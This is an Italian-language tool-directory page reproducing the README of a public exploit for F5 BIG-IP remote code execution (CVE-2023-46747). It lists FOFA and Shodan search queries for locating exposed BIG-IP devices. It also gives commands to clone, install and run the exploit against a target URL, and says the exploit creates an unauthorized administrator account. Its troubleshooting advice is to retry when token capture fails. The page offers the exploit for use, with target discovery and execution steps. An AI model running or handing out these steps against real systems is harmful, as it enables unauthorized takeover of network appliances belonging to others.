Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-46747-RCE — exploit per f5-big-ip RCE cve-2023-46747 | Kitploit
Strumenti/GitHubGitHub/w01fh4cker/cve-2023-46747-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed Teaming
GitHubw01fh4cker/cve-2023-46747-rce

CVE-2023-46747-RCE

exploit per f5-big-ip RCE cve-2023-46747

Vedi Repository
209471 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dettagli sulla vulnerabilità

fofa:

root@kitploit:~
(title="BIG-IP®" || icon_hash="-335242539")

shodan

root@kitploit:~
title:"BIG-IP®"

Versioni interessate

https://my.f5.com/manage/s/article/K000137353

Riproduzione della vulnerabilità

  1. Al momento, qui l'utente è solo admin: image

  2. Esegui lo script:

root@kitploit:~
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Comando eseguito con successo:
image

  1. Qui è stato creato con successo un nuovo utente senza autorizzazione: image

Limitazione

L'exploit fallisce in alcune versioni, riferimento: https://twitter.com/joel_land/status/1729147886615818732.

Domande e risposte

  1. D: Acquisizione del token non riuscita?
    R: Non si può affermare che il sito testato sia sicuramente privo di vulnerabilità, perché la creazione di un utente senza autorizzazione non riesce al 100%. A volte, per qualche motivo, non si riesce a creare un utente al primo passaggio, quindi il token non può essere ottenuto al secondo passaggio. Pertanto, il mio suggerimento è di riprovare ancora qualche volta. Se non funziona, potrebbe significare che non c'è davvero alcuna vulnerabilità.

Divagazione

Puoi usare questo script https://github.com/BishopFox/bigip-scanner per raccogliere informazioni sulla versione di F5 BIG-IP. È fantastico!

Riferimenti

https://github.com/projectdiscovery/nuclei-templates/pull/8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747

Scarica lo strumento